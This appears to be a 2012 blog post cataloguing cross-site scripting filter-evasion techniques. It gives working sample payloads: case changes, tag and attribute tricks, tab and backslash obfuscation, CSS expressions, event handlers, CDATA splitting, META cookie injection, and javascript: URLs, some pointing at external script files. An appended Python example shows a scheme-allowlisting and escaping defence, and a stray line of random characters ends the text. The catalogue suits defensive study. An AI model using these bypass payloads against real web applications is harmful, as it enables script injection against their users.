Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular-expression check

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a file extension other than .js

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

    example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert extra characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab (the gaps in the first line are tab characters)

         -> newline (the gaps in the second line are newlines)

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Original: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Original: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event-handler attributes)

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an swf file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
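The bypasses in items 1, 6 and 14 (case changes, tab/newline splits inside the scheme, javascript: in src/href) all defeat a blacklist regex that looks for the literal string "javascript" or "<script". The defence that does not depend on spotting the payload is to allowlist the URL scheme after normalising the control characters browsers ignore, and to entity-encode every user value for the context it lands in. The following is an added example, not code from the original post; SAFE_SCHEMES, safe_url, render_img, render_text and the sample inputs are my own.

```python
import html
import re
from typing import Optional

# Schemes a user-supplied src/href may use. Anything else (javascript:,
# vbscript:, data:, ...) is rejected outright instead of pattern-matched.
SAFE_SCHEMES = {"http", "https", "mailto"}

# ASCII control characters and whitespace. Browsers drop tab/CR/LF inside a
# URL scheme, which is why "jav<TAB>ascript:" still executes; normalising
# them away before the check removes that gap.
_CTRL = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def safe_url(raw: str) -> Optional[str]:
    """Return raw if its scheme is allowlisted (or it has no scheme), else None."""
    cleaned = _CTRL.sub("", raw).lower()   # defeats case changes and tab/newline splits
    m = _SCHEME.match(cleaned)
    if m is None:
        return raw                         # relative URL such as /img/a.png
    return raw if m.group(1) in SAFE_SCHEMES else None


def render_img(user_src: str) -> str:
    """Emit an <img> whose src passed the allowlist and is attribute-encoded, so
    neither a javascript: scheme nor an embedded quote can change the markup."""
    src = safe_url(user_src) or "about:blank"
    return '<img src="%s">' % html.escape(src, quote=True)


def render_text(user_text: str) -> str:
    """Emit user text in HTML body context: entity-encode & < > " and '."""
    return html.escape(user_text, quote=True)


# Constructed inputs mirroring items 1, 6 and 14 of the post (sample data only).
SAMPLES = [
    "<sCript>alert('d')</scRipT>",
    "jav\tascr\nipt:alert('XSS3')",
    "JaVaScRiPt:alert('XSS')",
    "https://example.com/logo.png",
]

if __name__ == "__main__":
    print(render_text(SAMPLES[0]))
    for s in SAMPLES[1:]:
        print(render_img(s))
```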
2 Z9 k0 @2 a1 Y( F6 O3 B